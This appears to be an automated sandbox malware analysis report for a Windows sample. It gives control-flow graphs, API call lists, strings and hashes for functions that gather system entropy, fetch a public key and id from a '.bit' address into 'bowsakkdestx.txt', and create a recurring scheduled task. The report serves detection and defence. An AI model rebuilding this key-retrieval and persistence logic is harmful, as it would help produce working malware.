                                                                                                                                                    control_flow_graph 606 481920-4819e0 call 42f7c0 GetVersionExA LoadLibraryA * 3 609 481a0b-481a0d 606->609 610 4819e2-481a05 GetProcAddress * 2 606->610 611 481aba-481ac2 609->611 612 481a13-481a15 609->612 610->609 613 481acb-481ad3 611->613 614 481ac4-481ac5 FreeLibrary 611->614 612->611 615 481a1b-481a31 NetStatisticsGet 612->615 616 481b0d 613->616 617 481ad5-481b0b GetProcAddress * 3 613->617 614->613 618 481a69-481a85 NetStatisticsGet 615->618 619 481a33-481a5d call 42f7c0 call 45d550 615->619 621 481b0f-481b17 616->621 617->621 618->611 620 481a87-481aae call 42f7c0 call 45d550 618->620 619->618 620->611 623 481c0a-481c12 621->623 624 481b1d-481b23 621->624 630 481c1b-481c22 623->630 631 481c14-481c15 FreeLibrary 623->631 624->623 628 481b29-481b2b 624->628 628->623 633 481b31-481b42 628->633 635 481c31-481c44 LoadLibraryA 630->635 636 481c24-481c2b call 4549a0 630->636 631->630 644 481b45-481b47 633->644 638 481c4a-481c82 GetProcAddress * 3 635->638 639 481d4b-481d53 635->639 636->635 636->639 645 481caf-481cb7 638->645 646 481c84 638->646 642 481d59-481e56 GetProcAddress * 12 639->642 643 48223f-482256 call 482470 GlobalMemoryStatus call 42f7c0 639->643 647 481e5c-481e63 642->647 648 482233-482239 FreeLibrary 642->648 669 48225b-4822cd call 45d550 GetCurrentProcessId call 42f7c0 call 45d550 call 42a77e 643->669 650 481b98-481bb4 644->650 651 481b49-481b5d 644->651 652 481cb9-481cc0 645->652 653 481d06-481d08 645->653 656 481c86-481cac call 42f7c0 call 45d550 646->656 647->648 654 481e69-481e70 647->654 648->643 650->623 667 481bb6-481bca 650->667 670 481b8a-481b8c 651->670 671 481b5f-481b84 call 42f7c0 call 45d550 651->671 659 481ccb-481ccd 652->659 660 481cc2-481cc9 652->660 657 481d0a-481d3c call 42f7c0 call 45d550 653->657 658 481d3f-481d45 FreeLibrary 653->658 654->648 662 481e76-481e7d 654->662 656->645 657->658 658->639 659->653 666 481ccf-481cde 659->666 660->653 660->659 662->648 668 481e83-481e8a 662->668 666->653 680 481ce0-481d03 call 42f7c0 call 45d550 666->680 688 481bfc-481bfe 667->688 689 481bcc-481bf6 call 42f7c0 call 45d550 667->689 668->648 675 481e90-481e97 668->675 670->650 671->670 675->648 682 481e9d-481ea4 675->682 680->653 682->648 690 481eaa-481eb1 682->690 688->623 689->688 690->648 696 481eb7-481ebe 690->696 696->648 702 481ec4-481ecb 696->702 702->648 706 481ed1-481ed3 702->706 706->648 709 481ed9-481eea CreateToolhelp32Snapshot 706->709 709->648 712 481ef0-481f01 709->712 713 481f03-481f0f GetTickCount 712->713 714 481f15-481f22 Heap32ListFirst 712->714 713->714 715 481f28-481f2d 714->715 716 482081-482093 714->716 717 481f33-481f9d call 42f7c0 call 45d550 Heap32First 715->717 718 48209d-4820b2 Process32First 716->718 719 482095-482097 GetTickCount 716->719 734 481f9f-481faa 717->734 735 482015-482060 Heap32ListNext 717->735 721 48210a-482116 718->721 722 4820b4-4820f5 call 42f7c0 call 45d550 718->722 719->718 723 482118-48211a GetTickCount 721->723 724 482120-482135 721->724 722->721 751 4820f7-4820f9 722->751 723->724 732 482196-4821a2 724->732 733 482137 724->733 737 4821ac-4821c1 732->737 738 4821a4-4821a6 GetTickCount 732->738 740 482140-482181 call 42f7c0 call 45d550 733->740 741 481fb0-481feb call 42f7c0 call 45d550 Heap32Next 734->741 735->716 742 482062-482064 735->742 753 482219-482227 737->753 754 4821c3-482204 call 42f7c0 call 45d550 737->754 738->737 740->732 771 482183-482185 740->771 763 481fed-481fef 741->763 764 48200f 741->764 746 482079-48207b 742->746 747 482066-482077 GetTickCount 742->747 746->716 746->717 747->716 747->746 751->722 752 4820fb-482108 GetTickCount 751->752 752->721 752->722 760 482229-48222b 753->760 761 48222d CloseHandle 753->761 754->753 774 482206-482208 754->774 760->648 761->648 768 481ff1-482002 GetTickCount 763->768 769 482004-48200d 763->769 764->735 768->764 768->769 769->741 769->764 771->740 772 482187-482194 GetTickCount 771->772 772->732 772->740 774->754 775 48220a-482217 GetTickCount 774->775 775->753 775->754
                                                                                                                                                    APIs
                                                                                                                                                    • GetVersionExA.KERNEL32(00000094), ref: 00481983
                                                                                                                                                    • LoadLibraryA.KERNEL32(ADVAPI32.DLL), ref: 00481994
                                                                                                                                                    • LoadLibraryA.KERNEL32(KERNEL32.DLL), ref: 004819A1
                                                                                                                                                    • LoadLibraryA.KERNEL32(NETAPI32.DLL), ref: 004819AE
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,NetStatisticsGet), ref: 004819E8
                                                                                                                                                    • GetProcAddress.KERNEL32(?,NetApiBufferFree), ref: 004819FB
                                                                                                                                                    • NetStatisticsGet.NETAPI32(00000000,LanmanWorkstation,00000000,00000000,?), ref: 00481A2D
                                                                                                                                                    • NetStatisticsGet.NETAPI32(00000000,LanmanServer,00000000,00000000,?), ref: 00481A81
                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 00481AC5
                                                                                                                                                    • GetProcAddress.KERNEL32(?,CryptAcquireContextW), ref: 00481ADB
                                                                                                                                                    • GetProcAddress.KERNEL32(?,CryptGenRandom), ref: 00481AEE
                                                                                                                                                    • GetProcAddress.KERNEL32(?,CryptReleaseContext), ref: 00481B01
                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 00481C15
                                                                                                                                                    • LoadLibraryA.KERNEL32(USER32.DLL), ref: 00481C36
                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetForegroundWindow), ref: 00481C50
                                                                                                                                                    • GetProcAddress.KERNEL32(?,GetCursorInfo), ref: 00481C63
                                                                                                                                                    • GetProcAddress.KERNEL32(?,GetQueueStatus), ref: 00481C76
                                                                                                                                                    • FreeLibrary.KERNEL32(?), ref: 00481D45
                                                                                                                                                    • GetProcAddress.KERNEL32(?,CreateToolhelp32Snapshot), ref: 00481D73
                                                                                                                                                    • GetProcAddress.KERNEL32(?,CloseToolhelp32Snapshot), ref: 00481D86
                                                                                                                                                    • GetProcAddress.KERNEL32(?,Heap32First), ref: 00481D99
                                                                                                                                                    • GetProcAddress.KERNEL32(?,Heap32Next), ref: 00481DAC
                                                                                                                                                    • GetProcAddress.KERNEL32(?,Heap32ListFirst), ref: 00481DBF
                                                                                                                                                    • GetProcAddress.KERNEL32(?,Heap32ListNext), ref: 00481DD2
                                                                                                                                                    • GetProcAddress.KERNEL32(?,Process32First), ref: 00481DE5
                                                                                                                                                    • GetProcAddress.KERNEL32(?,Process32Next), ref: 00481DF8
                                                                                                                                                    • GetProcAddress.KERNEL32(?,Thread32First), ref: 00481E0B
                                                                                                                                                    • GetProcAddress.KERNEL32(?,Thread32Next), ref: 00481E1E
                                                                                                                                                    • GetProcAddress.KERNEL32(?,Module32First), ref: 00481E31
                                                                                                                                                    • GetProcAddress.KERNEL32(?,Module32Next), ref: 00481E44
                                                                                                                                                    • CreateToolhelp32Snapshot.KERNEL32(0000000F,00000000), ref: 00481EDD
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00481F03
                                                                                                                                                    • Heap32ListFirst.KERNEL32(00000000,00000010), ref: 00481F1A
                                                                                                                                                    • Heap32First.KERNEL32(00000024,?,?), ref: 00481F95
                                                                                                                                                    • Heap32Next.KERNEL32(?,?,?,?,?,194AC004), ref: 00481FE3
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00481FF1
                                                                                                                                                    • Heap32ListNext.KERNEL32(?,?), ref: 00482058
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00482066
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00482095
                                                                                                                                                    • Process32First.KERNEL32(?,00000128), ref: 004820AA
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 004820FB
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00482118
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 00482187
                                                                                                                                                    • GetTickCount.KERNEL32 ref: 004821A4
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AddressProc$CountTick$Library$Heap32Load$FirstFree$ListNextStatistics$CreateProcess32SnapshotToolhelp32Version
                                                                                                                                                    • String ID: $$ADVAPI32.DLL$CloseToolhelp32Snapshot$CreateToolhelp32Snapshot$CryptAcquireContextW$CryptGenRandom$CryptReleaseContext$GetCursorInfo$GetForegroundWindow$GetQueueStatus$Heap32First$Heap32ListFirst$Heap32ListNext$Heap32Next$Intel Hardware Cryptographic Service Provider$KERNEL32.DLL$LanmanServer$LanmanWorkstation$Module32First$Module32Next$NETAPI32.DLL$NetApiBufferFree$NetStatisticsGet$Process32First$Process32Next$Thread32First$Thread32Next$USER32.DLL
                                                                                                                                                    • API String ID: 4174345323-1723836103
                                                                                                                                                    • Opcode ID: 7892fcb137716207a1425ae7febf787ac69884024082663a250f7990229244b5
                                                                                                                                                    • Instruction ID: 1a290f2a1335d0d3a86819d1d60d6f49a84e0195e1de194fff26f42f4ca9d5b3
                                                                                                                                                    • Opcode Fuzzy Hash: 7892fcb137716207a1425ae7febf787ac69884024082663a250f7990229244b5
                                                                                                                                                    • Instruction Fuzzy Hash: 683273B0E002299ADB61AF64CC45B9EB6B9FF45704F0045EBE60CE6151EB788E84CF5D
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0041E690 Relevance: 110.9, APIs: 54, Strings: 9, Instructions: 696stringnetworkfileCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 776 41e690-41e6d8 call 42f7c0 timeGetTime call 423f74 call 40c6a0 783 41e6e0-41e6e6 776->783 784 41e6f0-41e722 call 42b420 call 40c500 783->784 789 41e724-41e729 784->789 790 41e72e-41e772 InternetOpenW 784->790 793 41ea1f-41ea40 call 423cf0 789->793 791 41e774-41e776 790->791 792 41e778-41e77d 790->792 794 41e78f-41e7b8 call 415ae0 call 421c02 791->794 795 41e780-41e789 792->795 800 41ea42-41ea46 793->800 801 41ea8d-41eacc lstrlenA lstrcpyA * 2 lstrlenA 793->801 816 41e882-41e8e5 call 415ae0 call 413ff0 call 412900 call 4159d0 794->816 817 41e7be-41e7f7 call 414690 call 40dd40 794->817 795->795 797 41e78b-41e78d 795->797 797->794 804 41ee2a call 411b10 800->804 805 41ea4c-41ea61 SHGetFolderPathA 800->805 806 41eaef-41eb12 801->806 807 41eace 801->807 818 41ee2f-41ee3a 804->818 805->784 812 41ea67-41ea88 PathAppendA DeleteFileA 805->812 810 41eb14-41eb16 806->810 811 41eb18-41eb1f 806->811 813 41ead0-41ead8 807->813 819 41eb2b-41eb4f call 4156d0 call 412900 810->819 820 41eb22-41eb27 811->820 812->784 814 41eaeb 813->814 815 41eada-41eae7 lstrlenA 813->815 814->806 815->813 821 41eae9 815->821 875 41e8f3-41e917 lstrcpyW 816->875 876 41e8e7-41e8f0 call 422587 816->876 840 41e7f9-41e7fe 817->840 841 41e86f-41e874 817->841 823 41ee4d-41ee82 call 40ef50 818->823 824 41ee3c-41ee3f 818->824 845 41eb51 819->845 846 41eb53-41eb66 lstrcpyW 819->846 820->820 826 41eb29 820->826 821->806 837 41ee86-41ee8c 823->837 824->783 826->819 842 41ee92-41ee94 837->842 843 41ee8e-41ee90 837->843 848 41e800-41e809 call 422587 840->848 849 41e80c-41e827 840->849 841->816 847 41e876-41e87f call 422587 841->847 852 41ee97-41ee9c 842->852 850 41eea0-41eeaf call 413ea0 843->850 845->846 853 41eb74-41ebe4 lstrlenA call 420c62 call 42b420 MultiByteToWideChar lstrcpyW call 423cf0 846->853 854 41eb68-41eb71 call 422587 846->854 847->816 848->849 860 41e842-41e848 849->860 861 41e829-41e82d 849->861 850->837 872 41eeb1-41eee3 call 40ef50 850->872 852->852 863 41ee9e 852->863 900 41ebe6-41ebea 853->900 901 41ec3d-41ec97 lstrlenW lstrlenA lstrcpyA * 2 lstrlenA 853->901 854->853 866 41e84e-41e86c 860->866 861->866 870 41e82f-41e840 call 4205a0 861->870 863->850 866->841 870->866 891 41eee7-41eeed 872->891 879 41e943-41e97a InternetOpenUrlW InternetReadFile 875->879 880 41e919-41e920 875->880 876->875 887 41e9ec-41ea08 InternetCloseHandle * 2 879->887 888 41e97c-41e994 SHGetFolderPathA 879->888 880->879 885 41e922-41e92e 880->885 892 41e930-41e935 885->892 893 41e937 885->893 889 41ea16-41ea19 887->889 890 41ea0a-41ea13 call 422587 887->890 888->887 895 41e996-41e9c2 PathAppendA call 4220b6 888->895 889->793 890->889 897 41eef3-41eef5 891->897 898 41eeef-41eef1 891->898 899 41e93c-41e93d lstrcatW 892->899 893->899 895->887 915 41e9c4-41e9e9 lstrlenA call 422b02 call 423a38 895->915 905 41eef8-41eefd 897->905 904 41ef01-41ef10 call 413ea0 898->904 899->879 900->804 906 41ebf0-41ec11 SHGetFolderPathA 900->906 908 41ec99 901->908 909 41ecbf-41ecdd 901->909 904->891 926 41ef12-41ef4c call 413ff0 call 412900 904->926 905->905 912 41eeff 905->912 906->784 914 41ec17-41ec38 PathAppendA DeleteFileA 906->914 916 41eca0-41eca8 908->916 910 41ece3-41eced 909->910 911 41ecdf-41ece1 909->911 918 41ecf0-41ecf5 910->918 917 41ecf9-41ed1b call 4156d0 call 412900 911->917 912->904 914->783 915->887 921 41ecbb 916->921 922 41ecaa-41ecb7 lstrlenA 916->922 937 41ed1d 917->937 938 41ed1f-41ed35 lstrcpyW 917->938 918->918 924 41ecf7 918->924 921->909 922->916 923 41ecb9 922->923 923->909 924->917 939 41ef50-41ef68 lstrcpyW 926->939 940 41ef4e 926->940 937->938 941 41ed43-41edab lstrlenA call 420c62 call 42b420 MultiByteToWideChar lstrcpyW lstrlenW 938->941 942 41ed37-41ed40 call 422587 938->942 944 41ef76-41efb3 call 413ff0 call 412900 939->944 945 41ef6a-41ef73 call 422587 939->945 940->939 956 41edad-41edb6 lstrlenW 941->956 957 41edbc-41edc1 941->957 942->941 962 41efb5 944->962 963 41efb7-41efc6 lstrcpyW 944->963 945->944 956->957 959 41ee44-41ee48 956->959 960 41ee10-41ee12 957->960 961 41edc3-41ede4 SHGetFolderPathA 957->961 964 41f01a-41f030 959->964 966 41ee14-41ee1a call 420bed 960->966 967 41ee1d-41ee1f 960->967 961->784 965 41edea-41ee0b PathAppendA DeleteFileA 961->965 962->963 968 41efd4-41efe0 963->968 969 41efc8-41efd1 call 422587 963->969 965->783 966->967 967->804 973 41ee21-41ee27 call 420bed 967->973 970 41efe2-41efeb call 422587 968->970 971 41efee-41f008 968->971 969->968 970->971 978 41f016 971->978 979 41f00a-41f013 call 422587 971->979 973->804 978->964 979->978
                                                                                                                                                    APIs
                                                                                                                                                    • timeGetTime.WINMM(?,?,?,?,?,004CB3EC,000000FF), ref: 0041E6C0
                                                                                                                                                      • Part of subcall function 0040C6A0: RegOpenKeyExW.KERNEL32(80000001,Software\Microsoft\Windows\CurrentVersion,00000000,000F003F,0041E6D4), ref: 0040C6C2
                                                                                                                                                      • Part of subcall function 0040C6A0: RegQueryValueExW.KERNEL32(00000000,SysHelper,00000000,00000004,?,?), ref: 0040C6F3
                                                                                                                                                      • Part of subcall function 0040C6A0: RegCloseKey.ADVAPI32(00000000), ref: 0040C700
                                                                                                                                                    • _memset.LIBCMT ref: 0041E707
                                                                                                                                                      • Part of subcall function 0040C500: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?), ref: 0040C51B
                                                                                                                                                    • InternetOpenW.WININET ref: 0041E743
                                                                                                                                                    • _wcsstr.LIBCMT ref: 0041E7AE
                                                                                                                                                    • _memmove.LIBCMT ref: 0041E838
                                                                                                                                                    • lstrcpyW.KERNEL32(?,?), ref: 0041E90A
                                                                                                                                                    • lstrcatW.KERNEL32(?,&first=false), ref: 0041E93D
                                                                                                                                                    • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 0041E954
                                                                                                                                                    • InternetReadFile.WININET(00000000,?,00000400,?), ref: 0041E96F
                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041E98C
                                                                                                                                                    • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041E9A3
                                                                                                                                                    • lstrlenA.KERNEL32(?,00000000,00000000,000000FF), ref: 0041E9CD
                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0041E9F3
                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 0041E9F6
                                                                                                                                                    • _strstr.LIBCMT ref: 0041EA36
                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EA59
                                                                                                                                                    • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EA74
                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 0041EA82
                                                                                                                                                    • lstrlenA.KERNEL32({"public_key":",00000000,000000FF), ref: 0041EA92
                                                                                                                                                    • lstrcpyA.KERNEL32(?,?), ref: 0041EAA4
                                                                                                                                                    • lstrcpyA.KERNEL32(?,?), ref: 0041EABA
                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 0041EAC8
                                                                                                                                                    • lstrlenA.KERNEL32(00000022), ref: 0041EAE3
                                                                                                                                                    • lstrcpyW.KERNEL32(?,00000000), ref: 0041EB5B
                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 0041EB7C
                                                                                                                                                    • _malloc.LIBCMT ref: 0041EB86
                                                                                                                                                    • _memset.LIBCMT ref: 0041EB94
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000001), ref: 0041EBAE
                                                                                                                                                    • lstrcpyW.KERNEL32(?,00000000), ref: 0041EBB6
                                                                                                                                                    • _strstr.LIBCMT ref: 0041EBDA
                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EC00
                                                                                                                                                    • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EC24
                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 0041EC32
                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 0041EC3E
                                                                                                                                                    • lstrlenA.KERNEL32(","id":"), ref: 0041EC51
                                                                                                                                                    • lstrcpyA.KERNEL32(?,?), ref: 0041EC6D
                                                                                                                                                    • lstrcpyA.KERNEL32(?,?), ref: 0041EC7F
                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 0041EC93
                                                                                                                                                    • lstrlenA.KERNEL32(00000022), ref: 0041ECB3
                                                                                                                                                    • lstrcpyW.KERNEL32(?,00000000), ref: 0041ED2A
                                                                                                                                                    • lstrlenA.KERNEL32(?), ref: 0041ED4B
                                                                                                                                                    • _malloc.LIBCMT ref: 0041ED55
                                                                                                                                                    • _memset.LIBCMT ref: 0041ED63
                                                                                                                                                    • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,?), ref: 0041ED7D
                                                                                                                                                    • lstrcpyW.KERNEL32(?,00000000), ref: 0041ED85
                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 0041EDA3
                                                                                                                                                    • lstrlenW.KERNEL32(?), ref: 0041EDAE
                                                                                                                                                    • SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 0041EDD3
                                                                                                                                                    • PathAppendA.SHLWAPI(?,bowsakkdestx.txt), ref: 0041EDF7
                                                                                                                                                    • DeleteFileA.KERNEL32(?), ref: 0041EE05
                                                                                                                                                    • _free.LIBCMT ref: 0041EE15
                                                                                                                                                    • _free.LIBCMT ref: 0041EE22
                                                                                                                                                    • lstrcpyW.KERNEL32(?,00000000), ref: 0041EF61
                                                                                                                                                    • lstrcpyW.KERNEL32(?,00000000), ref: 0041EFBF
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: lstrlen$lstrcpy$Path$FolderInternet$AppendFile$CloseDeleteOpen_memset$ByteCharHandleMultiWide_free_malloc_strstr$QueryReadTimeValue_memmove_wcsstrlstrcattime
                                                                                                                                                    • String ID: "$","id":"$&first=false$&first=true$.bit/$?pid=$Microsoft Internet Explorer$bowsakkdestx.txt${"public_key":"
                                                                                                                                                    • API String ID: 704684250-3586605218
                                                                                                                                                    • Opcode ID: 6f74d7777cd6e386d1515434a48a5c8013712f20069f7b3c921ae157018a1547
                                                                                                                                                    • Instruction ID: 6dbc96f3ccd93c00a013485041b5c7257b0a9ae09bebbc57280f72cccf7ce4d8
                                                                                                                                                    • Opcode Fuzzy Hash: 6f74d7777cd6e386d1515434a48a5c8013712f20069f7b3c921ae157018a1547
                                                                                                                                                    • Instruction Fuzzy Hash: FA421771508341ABD720DF25DC45BDB7BE8BF85308F44092EF88587292DB78E589CB9A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 0040D240 Relevance: 58.5, APIs: 25, Strings: 8, Instructions: 702comCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

                                                                                                                                                    • Executed
                                                                                                                                                    • Not Executed
                                                                                                                                                    control_flow_graph 1213 40d240-40d274 CoInitialize 1214 40d276-40d278 1213->1214 1215 40d27d-40d2dd CoInitializeSecurity call 414690 CoCreateInstance 1213->1215 1216 40da8e-40da92 1214->1216 1222 40d2e3-40d3ca VariantInit * 4 VariantClear * 4 1215->1222 1223 40da3c-40da44 CoUninitialize 1215->1223 1218 40da94-40da9c call 422587 1216->1218 1219 40da9f-40dab1 1216->1219 1218->1219 1229 40d3e2-40d3fe call 40b140 1222->1229 1230 40d3cc-40d3dd CoUninitialize 1222->1230 1224 40da69-40da6d 1223->1224 1227 40da7a-40da8a 1224->1227 1228 40da6f-40da77 call 422587 1224->1228 1227->1216 1228->1227 1236 40d400-40d402 1229->1236 1237 40d404 1229->1237 1230->1224 1238 40d406-40d424 call 40b1d0 1236->1238 1237->1238 1242 40d426-40d437 CoUninitialize 1238->1242 1243 40d43c-40d451 call 40b140 1238->1243 1242->1224 1247 40d453-40d455 1243->1247 1248 40d457 1243->1248 1249 40d459-40d494 call 40b1d0 1247->1249 1248->1249 1255 40d496-40d4a7 CoUninitialize 1249->1255 1256 40d4ac-40d4c2 1249->1256 1255->1224 1259 40d4c8-40d4dd call 40b140 1256->1259 1260 40da2a-40da37 1256->1260 1264 40d4e3 1259->1264 1265 40d4df-40d4e1 1259->1265 1260->1223 1266 40d4e5-40d508 call 40b1d0 1264->1266 1265->1266 1266->1260 1271 40d50e-40d524 1266->1271 1271->1260 1273 40d52a-40d542 1271->1273 1273->1260 1276 40d548-40d55e 1273->1276 1276->1260 1278 40d564-40d57c 1276->1278 1278->1260 1281 40d582-40d59b 1278->1281 1281->1260 1283 40d5a1-40d5b6 call 40b140 1281->1283 1286 40d5b8-40d5ba 1283->1286 1287 40d5bc 1283->1287 1288 40d5be-40d5e1 call 40b1d0 1286->1288 1287->1288 1288->1260 1293 40d5e7-40d5fd 1288->1293 1293->1260 1295 40d603-40d626 1293->1295 1295->1260 1298 40d62c-40d651 1295->1298 1298->1260 1301 40d657-40d666 1298->1301 1301->1260 1303 40d66c-40d681 call 40b140 1301->1303 1306 40d683-40d685 1303->1306 1307 40d687 1303->1307 1308 40d689-40d6a3 call 40b1d0 1306->1308 1307->1308 1308->1260 1312 40d6a9-40d6be call 40b140 1308->1312 1315 40d6c0-40d6c2 1312->1315 1316 40d6c4 1312->1316 1317 40d6c6-40d6e0 call 40b1d0 1315->1317 1316->1317 1317->1260 1321 40d6e6-40d6f4 1317->1321 1321->1260 1323 40d6fa-40d70f call 40b140 1321->1323 1326 40d711-40d713 1323->1326 1327 40d715 1323->1327 1328 40d717-40d731 call 40b1d0 1326->1328 1327->1328 1328->1260 1332 40d737-40d74c call 40b140 1328->1332 1335 40d752 1332->1335 1336 40d74e-40d750 1332->1336 1337 40d754-40d76e call 40b1d0 1335->1337 1336->1337 1337->1260 1341 40d774-40d7ce call 423aaf call 423551 call 4228e0 call 412c40 call 412900 1337->1341 1352 40d7d0 1341->1352 1353 40d7d2-40d7e3 call 40b140 1341->1353 1352->1353 1356 40d7e5-40d7e7 1353->1356 1357 40d7e9 1353->1357 1358 40d7eb-40d819 call 40b1d0 call 413210 1356->1358 1357->1358 1358->1260 1365 40d81f-40d835 1358->1365 1365->1260 1367 40d83b-40d85e 1365->1367 1367->1260 1370 40d864-40d889 1367->1370 1370->1260 1373 40d88f-40d8ab call 40b140 1370->1373 1376 40d8b1 1373->1376 1377 40d8ad-40d8af 1373->1377 1378 40d8b3-40d8cd call 40b1d0 1376->1378 1377->1378 1382 40d8dd-40d8f2 call 40b140 1378->1382 1383 40d8cf-40d8d8 1378->1383 1387 40d8f4-40d8f6 1382->1387 1388 40d8f8 1382->1388 1383->1260 1389 40d8fa-40d91d call 40b1d0 1387->1389 1388->1389 1389->1260 1394 40d923-40d98d call 40b400 VariantInit * 2 call 40b140 1389->1394 1399 40d993 1394->1399 1400 40d98f-40d991 1394->1400 1401 40d995-40da0e call 40b1d0 VariantClear * 3 1399->1401 1400->1401 1405 40da10-40da27 call 42052a 1401->1405 1406 40da46-40da67 CoUninitialize 1401->1406 1405->1260 1406->1224
                                                                                                                                                    APIs
                                                                                                                                                    • CoInitialize.OLE32(00000000), ref: 0040D26C
                                                                                                                                                    • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000006,00000003,00000000,00000000,00000000), ref: 0040D28F
                                                                                                                                                    • CoCreateInstance.OLE32(004D506C,00000000,00000001,004D4FEC,?,?,00000000,000000FF), ref: 0040D2D5
                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 0040D2F0
                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 0040D309
                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 0040D322
                                                                                                                                                    • VariantInit.OLEAUT32(?), ref: 0040D33B
                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 0040D397
                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 0040D3A4
                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 0040D3B1
                                                                                                                                                    • VariantClear.OLEAUT32(?), ref: 0040D3C2
                                                                                                                                                    • CoUninitialize.OLE32 ref: 0040D3D5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.1931987134.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000051A000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.0000000000529000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    • Associated: 00000006.00000002.1931987134.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_6_2_400000_E0tabE4K4r.jbxd
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Variant$ClearInit$Initialize$CreateInstanceSecurityUninitialize
                                                                                                                                                    • String ID: %Y-%m-%dT%H:%M:%S$--Task$2030-05-02T08:00:00$Author Name$PT5M$RegisterTaskDefinition. Err: %X$Time Trigger Task$Trigger1
                                                                                                                                                    • API String ID: 2496729271-1738591096
                                                                                                                                                    • Opcode ID: 064f8775d0f8e2c41a19284724a765924d542ce36425dc9d33a2f7668cf067d9
                                                                                                                                                    • Instruction ID: 4ad9c2e8017b41c765d67f99bb49247a0c13fc41f24acee5688789d455a97b09
                                                                                                                                                    • Opcode Fuzzy Hash: 064f8775d0f8e2c41a19284724a765924d542ce36425dc9d33a2f7668cf067d9
                                                                                                                                                    • Instruction Fuzzy Hash: 05526F70E00219DFDB10DFA8C858FAEBBB4EF49304F1481A9E505BB291DB74AD49CB95
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Function 00410FC0 Relevance: 33.4, APIs: 18, Strings: 1, Instructions: 149encryptionstringCOMMON
                                                                                                                                                    Download Yara Rule

                                                                                                                                                    Control-flow Graph

